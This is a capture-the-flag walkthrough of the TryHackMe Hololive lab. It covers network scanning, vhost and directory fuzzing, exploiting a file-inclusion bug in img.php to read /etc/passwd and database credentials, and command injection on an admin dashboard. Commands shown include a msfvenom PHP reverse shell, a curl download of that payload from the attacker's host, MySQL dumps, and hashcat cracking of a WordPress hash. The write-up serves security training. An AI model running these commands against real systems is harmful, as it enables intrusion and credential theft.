Nathanule's Write-ups
  • Nathanule's Write-Ups
  • Cheat sheets and Notes
    • Windows Privilege escalation
      • Communication with processes
      • Windows User Privileges
        • Windows Privilege Overview
        • SeImpersonate and SeAssignPrimaryToken
        • SeDebugPrivilege
    • SMTP
    • Directory brute-forcing (Fuzzing web directories)
    • Fuzzing Subdomains and Virtual hosts
    • Pivoting, Tunneling, and Port Forwarding
      • Pivoting around obstacles
      • Branching out our tunnels
      • Cheat sheets
    • Transferring Files
    • Powershell Notes
    • Active Directory Notes/Cheat sheets
      • Initial Enumeration
        • External Recon
          • Hunting E-mail addresses, usernames, credentials
      • External Information Gathering
  • Walk-throughs
    • HTB Windows Machines
      • APT
      • Mantis HTB
      • Reel HTB
      • Flight HTB
      • Visual HTB
      • Worker HTB
      • Fuse HTB
      • Buff HTB
      • Granny HTB
      • Grandpa HTB
      • Optimum HTB
      • Legacy
      • Jerry HTB
      • Silo HTB
      • Sizzle HTB
      • Tally HTB
      • Bart HTB
      • Jeeves HTB
    • HTB Linux Machines
      • Zipping HTB
      • devvortex HTB
      • Magic HTB
      • Bizness HTB
      • Sua
      • Mango HTB
      • Haircut HTB
      • Postman HTB
      • Friendzoned HTB
      • Mirai HTB
      • Networked HTB
      • Popcorn HTB
      • Posion HTB
      • Sunday HTB
      • SwagShop HTB
      • Irked HTB
      • Academy
    • HTB Endgames
      • Hades
      • Xen
      • P.O.O
      • Hololive THM
    • WPE Capstones
      • Querier HTB
      • Bastion HTB
      • Bastard HTB
      • Arctic HTB
      • Alfred THM
    • LPE Capstones
      • Brainpan 1 THM
      • ConvertMyVideo THM
      • Tomghost THM
      • Lazy Admin THM
      • Anonymous THM
    • Mobile
      • APKey
    • Snap-labs (Entry Level Pentesting)
    • Hardware
      • The needle
      • Debugging Interface
    • ICS and SCADA
      • Watersnake
    • Blockchain
      • Survival of the Fittest
Powered by GitBook
On this page
  1. Walk-throughs
  2. HTB Endgames

Hololive THM

PreviousP.O.ONextWPE Capstones

Last updated 1 year ago

Lets start with scanning the network

Let's run a ping sweep on the initial networks 

sudo nmap -sn -n 10.200.108.0/24 192.168.100.0/24 -oA ping_sweep

  • While looking at the output we may see that that the subnet of 192.168.100.0/24 all hosts are alive this must be some kind of firewall issue

  • While looking at the 10.200.108.0/24 subnet we can see the following to hosts are alive

Nmap scan report for 10.200.108.33
Host is up (0.29s latency).
Nmap scan report for 10.200.108.250
Host is up (0.29s latency).

Lets get a feel for what these hosts are doing

sudo nmap -sCV -A -oA initial_10.200.108.x_subnet_scan 10.200.108.33 10.200.108.250

results

10.200.108.250

Nmap scan report for 10.200.108.250
Host is up (0.29s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:c7:ac:e2:a2:71:39:39:c4:0b:fa:8d:be:c4:9c:f9 (RSA)
|   256 4b:db:80:6e:e2:49:a0:e1:65:d7:84:a6:ae:65:8a:94 (ECDSA)
|_  256 88:5a:24:b8:ea:f8:67:9b:1f:9c:c7:72:fc:dc:21:85 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=1/19%OT=22%CT=1%CU=36098%PV=Y%DS=1%DC=T%G=Y%TM=65AA056
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=103%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=FE8
OS:8%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   295.55 ms 10.200.108.250

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 57.45 seconds

what can wee see

  • Looks like a Ubuntu machine

  • SSH in enabled

10.200.108.33

Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-19 00:14 EST
Nmap scan report for 10.200.108.33
Host is up (0.29s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 54:fb:cb:1b:f1:04:35:0f:ac:84:4d:f5:98:4d:be:d6 (RSA)
|   256 e6:0d:65:d1:26:a8:e2:83:7b:d7:9e:7e:31:c0:ec:96 (ECDSA)
|_  256 12:b6:90:b2:a2:c0:93:f7:80:f9:19:4f:86:95:00:27 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: holo.live
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-generator: WordPress 5.5.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=1/19%OT=22%CT=1%CU=30376%PV=Y%DS=2%DC=T%G=Y%TM=65AA056
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)SEQ
OS:(SP=108%GCD=2%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M509ST11NW7%O2=M509ST11
OS:NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=F4B
OS:3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=F507%O=M50
OS:9NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(
OS:R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F
OS:=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T
OS:=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RI
OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   295.56 ms 10.50.104.1
2   294.53 ms 10.200.108.33

What can we see

  • Ubuntu machine

  • This looks to be a web server

    • title name: holo.live will add this to our hosts file

    • Apache web server 2.4.29

    • Looks like it is utilizing WordPress 5.5.3

    • we have a list of dissallowed entries

/var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php

  • Notice the path files /var/www/wordpress could be an indication for LFI

  • SSH is enabled on the machine

Lets run a full port nmap scan of both targets

sudo nmap -p- -sV -oA full_port_10.200.108.x_subnet_scan 10.200.108.33 10.200.108.250

  • we do notice something interesting within a full port scans

10.200.108.33

Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache/2.4.29 (Ubuntu)
33060/tcp open  mysqlx?

  • Looks like we have a mysqlx server running on the web server

10.200.108.250

22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
1337/tcp open  http    Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  • Looks like we have Node.js Express framework running

10.200.108.33:80 holo.live

When we navigate to holo.live we can see the following

Noticed when we type "holo.live" within the url bar it redirected me to www.holo.live

I want check for any virtual host routing for this we can use wfuzz

wfuzz -c -f sub-fighter -u '10.200.108.33' -H 'Host:FUZZ.holo.live' -w /opt/SecLists/Discovery/DNS/subdomains-top1million-20000.txt -s 20

  • Now if we notice in the results we have alot off 200's codes, not all of these are a separate vhost, we want to look for anomalies that stick out

results

  • Notice the chars, word, and lines value, they are different from the rest of the requests, id say these are our vhosts on the server and we can add these to a hosts file

wpscan --url 10.200.108.33 --enumerate ap --plugins-detection aggressive --api-token <api_token> > wpscan.out

results that seem interestings

Title: WordPress < 5.8.3 - SQL Injection via WP_Query
 |     Fixed in: 5.5.8
 |     References:
 |      - https://wpscan.com/vulnerability/7f768bcf-ed33-4b22-b432-d1e7f95c1317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21661
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84
 |      - https://hackerone.com/reports/1378209

10.200.108.33:80 (www.holo.live)

navigatting to the web page we can see the following

Lets run feroxbuster and see if we can find anything interesting

feroxbuster -u http://www.holo.live -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_www_holo_live_http.txt -x php

  • nothing to interesting

Lets check out these vhosts

dev.holo.live

  • Looks like they are currently working on an updated website

Lets run feroxbuster and see if we can find anything

feroxbuster -u http://dev.holo.live -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dev_dirs_http.txt -x php

we do find an interesting php function

200      GET        0l        0w        0c http://dev.holo.live/img.php

Looking in the page's source we can see the img.php function is used to retrieve images from the /images directory

Lets see if we ca abuse this function, maybe cat out the /etc/passwd file

our browser download the img.php function, but it actually contains the /etc/passwd contents

admin.holo.live

Lets check the robots.txt

  • Looks like we can utilize that lfi we found earlier and grab some creds

dev.holo.live

looks like we both a set of credentials for the db and a username

admin:DBManagerLogin!
gurag

for good measures i want to see what the other dissallowed entries can show us 

http://dev.holo.live/img.php?file=/var/www/admin/dashboard.php

we can see a some what rendered dashboard

we can see the version in the page source

  • couldnt find anything interesting

Lets see if we can use the credentials we found to login into the admin.holo.live

  • it works

  • Not much in the way of functionality here, lets go back to our lfi

if we look at the page source of 

view-source:http://dev.holo.live/img.php?file=/var/www/admin/dashboard.php

  • we do see somehitng interesting

essentially what this block of php code is telling us

if dashboard.php?cmd=NULL; execute on the system "cat /tmp/Views.txt"

Now by default the admin dash board is not passing any data to the function dashboard.php, but what if 

dashboard.php?cmd=whoami

we should gett code execution on the back end

lets try

  • woohoo we have code execution, Now lets set up a php reverse-shell and see if we can establish a reverse-shell to 10.200.108.33

  1. Lets utilize msfvenon to generate a php reverse-shell

msfvenom -p php/reverse_php LHOST=10.50.104.129 LPORT=9001 -o shell.php

  1. we need to find a directory we can write to

find / -type d -writable

  1. Lets use curl to download our rev.php onto the system

curl http://10.50.104.129:80/shell.php -o /var/www/wordpress/shell.php

  1. Now we should be able to execute it and gain a reverse-shell on the system

php /var/www/wordpress/rev.php

  • we do get a shell as www-data but it is short lived

Lets see if we can dump the mysql databases

http://admin.holo.live/dashboard.php?cmd=mysqldump%20--host=127.0.0.1%20-u%20admin%20-p%27DBManagerLogin!%27%20--all-databases

lets list the databases

mysql -h 127.0.0.1 -u admin -p'DBManagerLogin!' -e 'SHOW DATABASES;'

Lets list the tables in the wordpress database


mysql -h 127.0.0.1 -u admin -p'DBManagerLogin!' -e 'SHOW TABLES;' wordpress

Lets dump the wp_users table

mysqldump -h 127.0.0.1 -u admin -p'DBManagerLogin!' --opt wordpress wp_users

Looks like we found the user admin and there hashed password

Lets see if we can crackit

$P$BNIIemIQlkZoVqK/XIqOlcpNToFoIu0

  • looks like a PHPASS hash

lets see if we can crack it using hashcat

hashcat -m 400 admin_hash /usr/share/wordlists/rockyou.txt